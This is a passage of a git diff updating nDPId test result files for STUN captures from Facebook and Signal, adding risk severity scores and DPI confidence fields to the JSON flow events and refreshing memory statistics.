 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594887 bytes
-~~ total memory freed........: 4594887 bytes
-~~ total allocations/frees...: 99555/99555
+~~ total memory allocated....: 4679840 bytes
+~~ total memory freed........: 4679840 bytes
+~~ total allocations/frees...: 101145/101145
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 179 chars
 ~~ json string max len.......: 2192 chars
diff --git a/test/results/stun_facebook.pcapng.out b/test/results/stun_facebook.pcapng.out
index e7d86f81b..70a8541a1 100644
--- a/test/results/stun_facebook.pcapng.out
+++ b/test/results/stun_facebook.pcapng.out
@@ -2,9 +2,9 @@
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1629291451242,"flow_last_seen":1629291451242,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1629291451242,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1629291451242,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1629291451242,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4VYJAAEARop7AqAypHw1WNpTrnEMAJO1IAAMACCESpEJBSzdRUHlQSzlldVYAGQAEEQAAAA=="}
 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1629291451254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1629291451254,"pkt":"mt9Y+uvcCL6sCxduCABFAACER+pAAFURmuofDVY2wKgMqZxDlOsAcMgPARMAVCESpEJBSzdRUHlQSzlldVYACQAQAAAEAXVuYXV0aG9yaXplZAAVAChiYjAzMWQ2MWNjYzFiZTgyZTI0MDE0NDM1ZWQ1MmYyNmZiYTYyNDgzABQAD3R1cm5lci5mYWNlYm9vawA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1629291451242,"flow_last_seen":1629291451254,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1629291451254,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1629291451242,"flow_last_seen":1629291451254,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1629291451254,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}}
 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1629291451258,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"ts_msec":1629291451258,"pkt":"CL6sCxdumt9Y+uvcCABFAACkVYNAAEARojHAqAypHw1WNpTrnEMAkHyWAAMAdCESpEI1elVqTVhIdmV3K3MAGQAEEQAAAAAGABBNZjJoOUhpNWFQTVJwbEYxABQAD3R1cm5lci5mYWNlYm9vawAAFQAoYmIwMzFkNjFjY2MxYmU4MmUyNDAxNDQzNWVkNTJmMjZmYmE2MjQ4MwAIABSHhqaIN2rgJVJbblyGsNjNga5wAA=="}
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1629291451242,"flow_last_seen":1629291461336,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":7404,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1629291461336,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1629291451242,"flow_last_seen":1629291461336,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":7404,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1629291461336,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}}
 00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 75/75
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4605212 bytes
-~~ total memory freed........: 4605212 bytes
-~~ total allocations/frees...: 99630/99630
+~~ total memory allocated....: 4690165 bytes
+~~ total memory freed........: 4690165 bytes
+~~ total allocations/frees...: 101220/101220
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 168 chars
-~~ json string max len.......: 730 chars
-~~ json string avg len.......: 509 chars
+~~ json string max len.......: 839 chars
+~~ json string avg len.......: 559 chars
diff --git a/test/results/stun_signal.pcapng.out b/test/results/stun_signal.pcapng.out
index 8401f4d6a..9b1e988eb 100644
--- a/test/results/stun_signal.pcapng.out
+++ b/test/results/stun_signal.pcapng.out
@@ -13,32 +13,32 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1636901936070,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901936070,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnVBAAEAR9NXAqAypI563p5peAbsAHIqqAAEAACESpEJaZmI0ZFV3bVhyejU="}
 00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1636901936083,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1636901936083,"pkt":"mt9Y+uvcCL6sCxduCABFAABMbq0AAOABw2wjnrenwKgMqQMDpcEAAAAARQAAMJ1NQAAgERTZwKgMqSOet6e4ZAG7ABzz8QABAAAhEqRCME1BM2doTDV4K0Zu"}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"proto":"ICMP.AmazonAWS","breed":"Acceptable","category":"Network"},"entropy":5.050556}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901936083,"flow_last_seen":1636901936083,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1636901936083,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556}
 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABwLztAAOARwqojnrenwKgMqQ2WuGQAXLAaAQEAQCESpEJjaDExN25ZQXk2MTAAIAAIAAEPY3w9RVEAAQAIAAEucV0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAATCHshI"}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABMbq4AAOABw2sjnrenwKgMqQMDpcEAAAAARQAAMJ1QQAAdERfWwKgMqSOet6eaXgG7AByKqgABAAAhEqRCWmZiNGRVd21Ycno1"}
 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1636901936087,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1636901936087,"pkt":"mt9Y+uvcCL6sCxduCABFAABwLzxAAOMRv6kjnrenwKgMqQ2Wml4AXJaEAQEAQCESpEJkOSt6R0JMc3JIbisAIAAIAAEPYnw9RVEAAQAIAAEucF0v4ROAKwAIAAENliOet6eALAAIAAEAUCOet6eAIgAETm9uZYAoAAT07Zjq"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1636901936120,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1636901936120,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVJAAEAR9MvAqAypI563p5peDZYAJPVxAAMACCESpEI3Q1lCTmVMaEVzcmUAGQAEEQAAAA=="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1636901936135,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1636901936135,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVNAAEAR9MrAqAypI563p7hkAbsAJNuCAAMACCESpEI0YTJQbEl4dk1TUisAGQAEEQAAAA=="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1636901936135,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1636901936135,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVRAAEAR9MnAqAypI563p5peAbsAJPWkAAMACCESpEJKS0hOWUJHNGV5VkoAGQAEEQAAAA=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936070,"flow_last_seen":1636901936138,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1636901936138,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936070,"flow_last_seen":1636901936138,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1636901936138,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1636901936144,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1636901936144,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4nVVAAEAR9MjAqAypI563p7hkDZYAJNmuAAMACCESpEIwWE1VcCtxUS9rUlMAGQAEEQAAAA=="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936144,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1636901936144,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936144,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1636901936144,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1636901936150,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1636901936150,"pkt":"mt9Y+uvcCL6sCxduCABFAABUbrkAAOABw1gjnrenwKgMqQMDpckAAAAARQAAOJ1TQAAgERTLwKgMqSOet6e4ZAG7ACTbggADAAghEqRCNGEyUGxJeHZNU1IrABkABBEAAAA="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1636901936292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901936292,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwdWhAAEAR0YbAqAyprP15f5peS2YAHHHgAAEAACESpEJTQ2RLNjF0alZXNms="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1636901936040,"flow_last_seen":1636901936292,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901936292,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1636901936040,"flow_last_seen":1636901936292,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901936292,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1636901936292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901936292,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwdWlAAEAR0YXAqAyprP15f7hkS2YAHGpqAAEAACESpEJ0a0VLMmtzWEZzMm8="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1636901936316,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901936316,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnWJAAEAR9MPAqAypI563p7hkAbsAHPPxAAEAACESpEIwTUEzZ2hMNXgrRm4="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1636901936320,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901936320,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnWNAAEAR9MLAqAypI563p5peAbsAHIqqAAEAACESpEJaZmI0ZFV3bVhyejU="}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936320,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1636901936320,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901936070,"flow_last_seen":1636901936320,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1636901936320,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1636901936411,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1636901936411,"pkt":"mt9Y+uvcCL6sCxduCABFgAA80K0AACYRz7Ws\/Xl\/wKgMqUtmml4AKJ+iAQEADCESpEJTQ2RLNjF0alZXNmsAIAAIAAEPYnw9RVE="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1636901936415,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1636901936415,"pkt":"mt9Y+uvcCL6sCxduCABFgAA8TlEAACURUxKs\/Xl\/wKgMqUtmuGQAKJgrAQEADCESpEJ0a0VLMmtzWEZzMm8AIAAIAAEPY3w9RVE="}
-00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901936065,"flow_last_seen":1636901936889,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636901936889,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901936065,"flow_last_seen":1636901936889,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636901936889,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1636901956886,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901956886,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwnuBAAEAR80XAqAypI563p6g8DZYAHMrjAAEAACESpEJ3MXhZWGxMSlFtK2Q="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901956886,"flow_last_seen":1636901956886,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"ts_msec":1636901956886,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
